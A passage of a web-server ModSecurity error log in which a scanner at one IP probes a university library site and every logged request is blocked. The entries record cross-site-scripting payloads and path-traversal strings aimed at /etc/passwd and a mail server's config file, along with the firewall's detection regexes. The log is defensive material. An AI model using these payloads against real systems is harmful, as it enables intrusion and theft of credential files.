"ZO15g8Co-f0AAAn400EAAAAW"]
[Tue Aug 29 11:52:21.387953 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAoEZNAAAAAB"]
[Tue Aug 29 11:52:22.164146 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hsCo-f0AAAoEZNsAAAAB"]
[Tue Aug 29 11:52:23.607220 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAoO5yQAAAAK"]
[Tue Aug 29 11:52:24.859857 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAnoOq4AAAAf"]
[Tue Aug 29 11:52:24.861508 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15iMCo-f0AAAoLfFIAAAAG"]
[Tue Aug 29 11:52:25.591644 2023] [:error] [pid 2572] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAoMLagAAAAH"]
[Tue Aug 29 11:52:26.546988 2023] [:error] [pid 2572] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAoMLaoAAAAH"]
[Tue Aug 29 11:52:26.592957 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15isCo-f0AAAn4004AAAAW"]
[Tue Aug 29 11:52:26.617577 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoN9cUAAAAJ"]
[Tue Aug 29 11:52:26.641594 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAnTlPYAAAAA"]
[Tue Aug 29 11:52:27.584467 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAnn2DQAAAAe"]
[Tue Aug 29 11:52:27.851758 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15i8Co-f0AAAlIBmsAAAAn"]
[Tue Aug 29 11:52:28.722347 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAoQ3IcAAAAN"]
[Tue Aug 29 11:52:29.884056 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAoEZPMAAAAB"]
[Tue Aug 29 11:52:30.551552 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAjdQckAAAAZ"]
[Tue Aug 29 11:52:32.618783 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAnn2EcAAAAe"]
[Tue Aug 29 11:52:33.571824 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAnd3HwAAAAI"]
[Tue Aug 29 11:52:33.643289 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAn402EAAAAW"]
[Tue Aug 29 11:52:34.658601 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAnjjQUAAAAX"]
[Tue Aug 29 11:52:34.680793 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAoGFY0AAAAE"]
[Tue Aug 29 11:52:36.750057 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAoN9ekAAAAJ"]
[Tue Aug 29 11:52:37.535917 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAfWOPcAAAAL"]
[Tue Aug 29 11:52:37.685247 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAnjjREAAAAX"]
[Tue Aug 29 11:52:40.055509 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAnjjR0AAAAX"]
[Tue Aug 29 11:52:40.658891 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAoLfIsAAAAG"]
[Tue Aug 29 11:52:41.789200 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAnHQm0AAAAT"]
[Tue Aug 29 11:52:42.530672 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoQ3LcAAAAN"]
[Tue Aug 29 11:52:42.561233 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoO52AAAAAK"]
